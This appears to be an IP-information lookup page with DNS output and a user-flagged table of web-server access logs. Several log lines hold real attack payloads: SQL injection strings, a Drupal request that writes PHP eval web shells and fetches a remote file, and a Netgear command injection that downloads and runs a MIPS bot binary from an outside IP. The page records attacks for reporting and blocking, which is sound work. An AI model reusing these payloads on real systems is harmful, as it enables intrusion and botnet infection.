城市(city): Wietze
省份(region): Lower Saxony
国家(country): Germany
运营商(isp): Telekom
主机名(hostname): unknown
机构(organization): Deutsche Telekom AG
使用类型(Usage Type): unknown
b
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 2003:e6:ef04:5b00:454e:bf45:1290:4448
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 56386
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;2003:e6:ef04:5b00:454e:bf45:1290:4448. IN A
;; AUTHORITY SECTION:
. 3600 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2019071800 1800 900 604800 86400
;; Query time: 2 msec
;; SERVER: 67.207.67.2#53(67.207.67.2)
;; WHEN: Fri Jul 19 01:40:56 CST 2019
;; MSG SIZE rcvd: 141
8.4.4.4.0.9.2.1.5.4.f.b.e.4.5.4.0.0.b.5.4.0.f.e.6.e.0.0.3.0.0.2.ip6.arpa domain name pointer p200300E6EF045B00454EBF4512904448.dip0.t-ipconnect.de.Server: 183.60.83.19
Address: 183.60.83.19#53
Non-authoritative answer:
8.4.4.4.0.9.2.1.5.4.f.b.e.4.5.4.0.0.b.5.4.0.f.e.6.e.0.0.3.0.0.2.ip6.arpa name = p200300E6EF045B00454EBF4512904448.dip0.t-ipconnect.de.
Authoritative answers can be found from:| IP | 类型 | 评论内容 | 时间 |
|---|---|---|---|
| 101.226.102.70 | attack | 101.226.102.70 - - [10/Apr/2019:15:01:18 +0800] "GET //moon.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 101.226.102.70 - - [10/Apr/2019:15:01:18 +0800] "GET //moon.php HTTP/1.1" 308 257 "http://ipinfo.asytech.cn//moon.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 101.226.102.70 - - [10/Apr/2019:15:01:18 +0800] "GET / HTTP/1.1" 301 194 "https://ipinfo.asytech.cn//moon.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 101.226.102.70 - - [10/Apr/2019:15:01:18 +0800] "GET / HTTP/1.1" 200 3272 "http://ipinfo.asytech.cn/" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" |
2019-04-10 15:03:48 |
| 14.17.3.64 | attack | 14.17.3.64 - - [13/Apr/2019:08:08:33 +0800] "GET /phpmyadmin/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 14.17.3.65 - - [13/Apr/2019:08:08:33 +0800] "GET /license.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 14.17.3.64 - - [13/Apr/2019:08:08:33 +0800] "GET /uploader.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 14.17.3.64 - - [13/Apr/2019:08:08:33 +0800] "GET /phpmyadmin/index.php HTTP/1.1" 404 209 "http://118.25.52.138/phpmyadmin/index.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 14.17.3.65 - - [13/Apr/2019:08:08:33 +0800] "GET /license.php HTTP/1.1" 404 209 "http://118.25.52.138/license.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 14.17.3.64 - - [13/Apr/2019:08:08:33 +0800] "GET /uploader.php HTTP/1.1" 404 209 "http://118.25.52.138/uploader.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" |
2019-04-13 08:17:33 |
| 42.56.30.66 | attack | 42.56.30.66 - - [09/Apr/2019:21:03:03 +0800] "GET /mgw.htm?operationType=com.cars.otsmobile.queryLeftTicket&requestData=%5B%7B\\x22train_date\\x22%3A\\x2220181231\\x22%2C\\x22purpose_codes\\x22%3A\\x2200\\x22%2C\\x22from_station\\x22%3A\\x22BJP\\x22%2C\\x22to_station\\x22%3A\\x22SHH\\x22%2C\\x22station_train_code\\x22%3A\\x22\\x22%2C\\x22start_time_begin\\x22%3A\\x220000\\x22%2C\\x22start_time_end\\x22%3A\\x222400\\x22%2C\\x22train_headers\\x22%3A\\x22QB%23\\x22%2C\\x22train_flag\\x22%3A\\x22\\x22%2C\\x22seat_type\\x22%3A\\x220\\x22%2C\\x22seatBack_Type\\x22%3A\\x22\\x22%2C\\x22ticket_num\\x22%3A\\x22\\x22%2C\\x22dfpStr\\x22%3A\\x22\\x22%2C\\x22baseDTO\\x22%3A%7B\\x22check_code\\x22%3A\\x22d38a201f2de926ce0686aedfdcf2de68\\x22%2C\\x22device_no\\x22%3A\\x22WtaHBzID7ZQDADJh05y5LLpd\\x22%2C\\x22mobile_no\\x22%3A\\x22\\x22%2C\\x22os_type\\x22%3A\\x22a\\x22%2C\\x22time_str\\x22%3A\\x2220181030152947\\x22%2C\\x22version_no\\x22%3A\\x224.1.9\\x22%7D%7D%5D&ts=1540884587652&sign=37b8ebe6406579e4fb2ac8c9038eab37 HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" |
2019-04-09 21:06:38 |
| 123.206.44.225 | attack | 123.206.44.225 - - [18/Apr/2019:22:22:21 +0800] "GET /web/phpMyAdmin/index.php HTTP/1.1" 404 518 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" 123.206.44.225 - - [18/Apr/2019:22:22:22 +0800] "GET /admin/pma/index.php HTTP/1.1" 404 513 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" 123.206.44.225 - - [18/Apr/2019:22:22:22 +0800] "GET /admin/PMA/index.php HTTP/1.1" 404 513 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" 123.206.44.225 - - [18/Apr/2019:22:22:23 +0800] "GET /admin/mysql/index.php HTTP/1.1" 404 515 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" 123.206.44.225 - - [18/Apr/2019:22:22:23 +0800] "GET /admin/mysql2/index.php HTTP/1.1" 404 516 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" |
2019-04-19 06:42:27 |
| 186.82.70.55 | attack | sql注入攻击 186.82.70.55 - - [10/Apr/2019:06:30:16 +0800] "GET /check-ip/14.34.148.34/%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(107,110,113,83,79,106,98,102,109,100,116,99),1),name_const (CHAR(107,110,113,83,79,106,98,102,109,100,116,99),1))a)%20--%20%27x%27=%27x HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0" 186.82.70.55 - - [10/Apr/2019:06:30:19 +0800] "GET /iplist/2%20or%20(1,2)=(select*from(select%20name_const(CHAR(85,104,114,106,112,73,65,102,81,80,111),1),name_const(CHAR(85,104,114,106,1 12,73,65,102,81,80,111),1))a)%20--%20and%201%3D1 HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0" 186.82.70.55 - - [10/Apr/2019:06:30:19 +0800] "GET /%20or%20(1,2)=(select*from(select%20name_const(CHAR(85,111,78,69,104,81,99,85,73),1),name_const(CHAR(85,111,78,69,104,81,99,85,73),1))a )%20--%20and%201%3D1 HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0" |
2019-04-10 07:14:16 |
| 200.72.174.42 | bots | 200.72.174.42 - - [17/Apr/2019:13:57:06 +0800] "GET /index.php/2019/04/17/pinduoduo_2019_04_17_en/ HTTP/1.0" 200 13400 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 200.72.174.42 - - [17/Apr/2019:13:57:13 +0800] "GET /wp-includes/wlwmanifest.xml HTTP/1.0" 200 4214 "https://www.eznewstoday.com/index.php/2019/04/17/pinduoduo_2019_04_17_en/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" |
2019-04-17 14:04:23 |
| 172.104.108.109 | bots | 172.104.108.109 - - [19/Apr/2019:09:14:51 +0800] "GET / HTTP/1.1" 301 194 "-" "Go-http-client/1.1" 172.104.108.109 - - [19/Apr/2019:09:14:52 +0800] "GET / HTTP/1.1" 200 3269 "http://118.25.52.138:80" "Go-http-client/1.1" |
2019-04-19 09:16:41 |
| 185.65.134.174 | attack | 185.65.134.174 - - [16/Apr/2019:22:01:51 +0800] "GET /.git/config HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 185.65.134.174 - - [16/Apr/2019:22:01:51 +0800] "\\x03\\x00" 400 182 "-" "-" 185.65.134.174 - - [16/Apr/2019:22:01:53 +0800] "GET /.git/config HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 185.65.134.174 - - [16/Apr/2019:22:01:55 +0800] "\\x03\\x00" 400 182 "-" "-" |
2019-04-16 22:09:36 |
| 119.203.225.156 | attack | 119.203.225.156 - - [11/Apr/2019:11:38:59 +0800] "GET /check-ip/148.70.11.98 HTTP/1.1" 200 8744 "https://ipinfo.asytech.cn/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36" 119.203.225.156 - - [11/Apr/2019:11:39:00 +0800] "GET /?q=node/add HTTP/1.1" 200 3267 "https://ipinfo.asytech.cn/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36" 119.203.225.156 - - [11/Apr/2019:11:39:00 +0800] "GET /?q=user HTTP/1.1" 200 3267 "https://ipinfo.asytech.cn/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36" |
2019-04-11 11:39:57 |
| 192.99.15.141 | attack | 192.99.15.141 - - [10/Apr/2019:21:48:58 +0800] "GET /?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=echo+%27Vuln%21%21+patch+it+Now%21%27+%3E+vuln.htm%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+sites%2Fdefault%2Ffiles%2Fvuln.php%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+vuln.php%3B+cd+sites%2Fdefault%2Ffiles%2F%3B+echo+%27AddType+application%2Fx-httpd-php+.jpg%27+%3E+.htaccess%3B+wget+%27http%3A%2F%2F40k.waszmann.de%2FDeutsch%2Fimages%2Fup.php%27 HTTP/1.1" 200 29740 "http://www.google.com.hk" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36" |
2019-04-11 06:38:05 |
| 101.226.79.190 | attack | 101.226.79.190 - - [10/Apr/2019:21:18:52 +0800] "GET /lindex.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 101.226.79.190 - - [10/Apr/2019:21:18:52 +0800] "GET /lindex.php HTTP/1.1" 404 209 "http://118.25.52.138/lindex.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 163.177.90.152 - - [10/Apr/2019:21:18:52 +0800] "GET /admin/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 163.177.90.152 - - [10/Apr/2019:21:18:53 +0800] "GET /admin/index.php HTTP/1.1" 404 209 "http://118.25.52.138/admin/index.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" |
2019-04-11 05:59:06 |
| 139.59.23.231 | attack | 139.59.23.231 - - [12/Apr/2019:08:13:30 +0800] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 301 194 "-" "ZmEu" 139.59.23.231 - - [12/Apr/2019:08:13:30 +0800] "GET /phpMyAdmin/ HTTP/1.1" 301 194 "-" "ZmEu" 139.59.23.231 - - [12/Apr/2019:08:13:30 +0800] "GET /phpmyadmin/ HTTP/1.1" 301 194 "-" "ZmEu" |
2019-04-12 08:15:40 |
| 27.115.124.6 | botsattack | 假百度refer 27.115.124.6 - - [18/Apr/2019:16:33:13 +0800] "GET /server-status HTTP/1.1" 403 3918 "http://www.baidu.com" "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0" |
2019-04-18 16:36:00 |
| 123.190.152.140 | attack | 123.190.152.140 - - [14/Apr/2019:09:56:22 +0800] "GET /mgw.htm?operationType=com.cars.otsmobile.queryLeftTicket&requestData=%5B%7B\\x22train_date\\x22%3A\\x2220181231\\x22%2C\\x22purpose_codes\\x22%3A\\x2200\\x22%2C\\x22from_station\\x22%3A\\x22BJP\\x22%2C\\x22to_station\\x22%3A\\x22SHH\\x22%2C\\x22station_train_code\\x22%3A\\x22\\x22%2C\\x22start_time_begin\\x22%3A\\x220000\\x22%2C\\x22start_time_end\\x22%3A\\x222400\\x22%2C\\x22train_headers\\x22%3A\\x22QB%23\\x22%2C\\x22train_flag\\x22%3A\\x22\\x22%2C\\x22seat_type\\x22%3A\\x220\\x22%2C\\x22seatBack_Type\\x22%3A\\x22\\x22%2C\\x22ticket_num\\x22%3A\\x22\\x22%2C\\x22dfpStr\\x22%3A\\x22\\x22%2C\\x22baseDTO\\x22%3A%7B\\x22check_code\\x22%3A\\x22d38a201f2de926ce0686aedfdcf2de68\\x22%2C\\x22device_no\\x22%3A\\x22WtaHBzID7ZQDADJh05y5LLpd\\x22%2C\\x22mobile_no\\x22%3A\\x22\\x22%2C\\x22os_type\\x22%3A\\x22a\\x22%2C\\x22time_str\\x22%3A\\x2220181030152947\\x22%2C\\x22version_no\\x22%3A\\x224.1.9\\x22%7D%7D%5D&ts=1540884587652&sign=37b8ebe6406579e4fb2ac8c9038eab37 HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" |
2019-04-14 10:04:14 |
| 151.16.139.97 | attack | 151.16.139.97 - - [11/Apr/2019:12:19:15 +0800] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=wget%20http://134.209.212.247/bins/September.mips%20-O%20/var/tmp/September.mips;%20chmod%20777%20/var/tmp/September.mips;%20/var/tmp/September.mips;%20rm%20-rf%20/var/tmp/September.mips&curpath=/¤tsetting.htm=1" 400 0 "-" "-" 151.16.139.97 - - [11/Apr/2019:12:19:18 +0800] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=wget%20http://134.209.212.247/bins/September.mips%20-O%20/var/tmp/September.mips;%20chmod%20777%20/var/tmp/September.mips;%20/var/tmp/September.mips;%20rm%20-rf%20/var/tmp/September.mips&curpath=/¤tsetting.htm=1" 400 0 "-" "-" |
2019-04-11 12:20:22 |